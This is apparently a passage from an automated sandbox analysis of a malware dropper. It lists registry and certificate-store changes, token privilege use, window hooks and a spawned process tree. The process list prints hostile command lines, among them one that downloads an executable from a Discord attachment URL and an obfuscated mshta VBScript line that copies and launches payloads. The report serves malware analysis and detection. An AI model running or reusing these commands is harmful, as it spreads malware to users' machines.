| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A} | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{8E26A34E-7831-44E6-9250-220C710C4C96} | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 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 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 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 | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\is-M3SAO.tmp\Setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 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 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B | C:\Users\Admin\AppData\Local\Temp\is-M3SAO.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = [certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 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 | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (4).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (4).exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\252N17XASxQvYmwIPdgoOr2I.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\252N17XASxQvYmwIPdgoOr2I.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\3771582.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1037051.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\JrnsbXuKnHgCU4MXvd9lN673.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\6286019.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\4366989.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\MlyZ927p4yUTmG7wolwMjuJW.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\Q75PAMhmUCVu5EYVYjDtmwTV.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\g8e3AhvD_JzgYVY7B0rwBYJ8.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\MlyZ927p4yUTmG7wolwMjuJW.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FCAGE.tmp\builder.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\Nd_tCvBxyCqjxaKpTy7uzCrF.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (4).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (4).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv yKasnM7UgUqICmWI3CBItg.0.2
C:\Users\Admin\Documents\6Ylf2oyixuJlsFBBGCC2hhnH.exe
"C:\Users\Admin\Documents\6Ylf2oyixuJlsFBBGCC2hhnH.exe"
C:\Users\Admin\Documents\252N17XASxQvYmwIPdgoOr2I.exe
"C:\Users\Admin\Documents\252N17XASxQvYmwIPdgoOr2I.exe"
C:\Users\Admin\Documents\QtlJmdftBRMjXw9vCUiz1xyb.exe
"C:\Users\Admin\Documents\QtlJmdftBRMjXw9vCUiz1xyb.exe"
C:\Users\Admin\Documents\g8e3AhvD_JzgYVY7B0rwBYJ8.exe
"C:\Users\Admin\Documents\g8e3AhvD_JzgYVY7B0rwBYJ8.exe"
C:\Users\Admin\Documents\JrnsbXuKnHgCU4MXvd9lN673.exe
"C:\Users\Admin\Documents\JrnsbXuKnHgCU4MXvd9lN673.exe"
C:\Users\Admin\Documents\vtyA9G81l1cmrF3KJ7iIdZ5W.exe
"C:\Users\Admin\Documents\vtyA9G81l1cmrF3KJ7iIdZ5W.exe"
C:\Users\Admin\Documents\MlyZ927p4yUTmG7wolwMjuJW.exe
"C:\Users\Admin\Documents\MlyZ927p4yUTmG7wolwMjuJW.exe"
C:\Users\Admin\Documents\Q75PAMhmUCVu5EYVYjDtmwTV.exe
"C:\Users\Admin\Documents\Q75PAMhmUCVu5EYVYjDtmwTV.exe"
C:\Users\Admin\Documents\YYUtH3wzsrRdr9GJTVYmEo6Y.exe
"C:\Users\Admin\Documents\YYUtH3wzsrRdr9GJTVYmEo6Y.exe"
C:\Users\Admin\Documents\s2SrnkZeJColor_BCrMr4Qso.exe
"C:\Users\Admin\Documents\s2SrnkZeJColor_BCrMr4Qso.exe"
C:\Users\Admin\Documents\hoN0r0eWJkmJDk4Ic3MMAGbj.exe
"C:\Users\Admin\Documents\hoN0r0eWJkmJDk4Ic3MMAGbj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3888 -s 276
C:\Users\Admin\Documents\mOT8c14fTMQWPkspwIJIZRyi.exe
"C:\Users\Admin\Documents\mOT8c14fTMQWPkspwIJIZRyi.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3888 -ip 3888
C:\Users\Admin\Documents\252N17XASxQvYmwIPdgoOr2I.exe
"C:\Users\Admin\Documents\252N17XASxQvYmwIPdgoOr2I.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\BC43.bat C:\Users\Admin\Documents\6Ylf2oyixuJlsFBBGCC2hhnH.exe"
C:\Users\Admin\AppData\Local\Temp\is-PGKIS.tmp\mOT8c14fTMQWPkspwIJIZRyi.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PGKIS.tmp\mOT8c14fTMQWPkspwIJIZRyi.tmp" /SL5="$20306,138429,56832,C:\Users\Admin\Documents\mOT8c14fTMQWPkspwIJIZRyi.exe"
C:\Users\Admin\Documents\s2SrnkZeJColor_BCrMr4Qso.exe
"C:\Users\Admin\Documents\s2SrnkZeJColor_BCrMr4Qso.exe" -q
C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Users\Admin\Documents\YYUtH3wzsrRdr9GJTVYmEo6Y.exe
C:\Users\Admin\Documents\YYUtH3wzsrRdr9GJTVYmEo6Y.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 1216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4724 -ip 4724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 4724 -ip 4724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 1240
C:\Users\Admin\AppData\Roaming\6286019.exe
"C:\Users\Admin\AppData\Roaming\6286019.exe"
C:\Users\Admin\AppData\Roaming\7848124.exe
"C:\Users\Admin\AppData\Roaming\7848124.exe"
C:\Users\Admin\AppData\Roaming\1104254.exe
"C:\Users\Admin\AppData\Roaming\1104254.exe"
C:\Users\Admin\AppData\Roaming\4366989.exe
"C:\Users\Admin\AppData\Roaming\4366989.exe"
C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4724 -ip 4724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 1240
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\Documents\biPuD4NMCX1aWFXogrvwgyou.exe
"C:\Users\Admin\Documents\biPuD4NMCX1aWFXogrvwgyou.exe"
C:\Users\Admin\Documents\PJ_aNIjQvqt14trhW_Ucrq8U.exe
"C:\Users\Admin\Documents\PJ_aNIjQvqt14trhW_Ucrq8U.exe"
C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Users\Admin\Documents\zmyJsBQVTyKAKlzE6Zk93Aiu.exe
"C:\Users\Admin\Documents\zmyJsBQVTyKAKlzE6Zk93Aiu.exe"
C:\Users\Admin\Documents\OxEMjCce4jUyKLgMR7tzCSZn.exe
"C:\Users\Admin\Documents\OxEMjCce4jUyKLgMR7tzCSZn.exe"
C:\Users\Admin\Documents\68N9UkYMb0rIC3Al6Fz2bfWy.exe
"C:\Users\Admin\Documents\68N9UkYMb0rIC3Al6Fz2bfWy.exe"
C:\Users\Admin\Documents\6w8pXrjYGBv_496W2DScTPB5.exe
"C:\Users\Admin\Documents\6w8pXrjYGBv_496W2DScTPB5.exe"
C:\Users\Admin\Documents\y6oB6X0JZzjl8qPpJh9Fxwxp.exe
"C:\Users\Admin\Documents\y6oB6X0JZzjl8qPpJh9Fxwxp.exe"
C:\Users\Admin\Documents\RUCOCZIgIz6EZKdtv5ptdFUF.exe
"C:\Users\Admin\Documents\RUCOCZIgIz6EZKdtv5ptdFUF.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Users\Admin\Documents\HUU_BBwFffdwtjU3aaYogmcF.exe
"C:\Users\Admin\Documents\HUU_BBwFffdwtjU3aaYogmcF.exe"
C:\Users\Admin\Documents\7tzdBCrqnVzn34WZzl2HJIRv.exe
"C:\Users\Admin\Documents\7tzdBCrqnVzn34WZzl2HJIRv.exe"
C:\Users\Admin\Documents\qaGGfh07ZqrsDrnbz8QRWzTX.exe
"C:\Users\Admin\Documents\qaGGfh07ZqrsDrnbz8QRWzTX.exe"
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\6w8pXrjYGBv_496W2DScTPB5.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\6w8pXrjYGBv_496W2DScTPB5.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\30528\DES6_6_6.exe
DES6_6_6.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2988 -ip 2988
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 316
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Windows\SysWOW64\cmd.exe
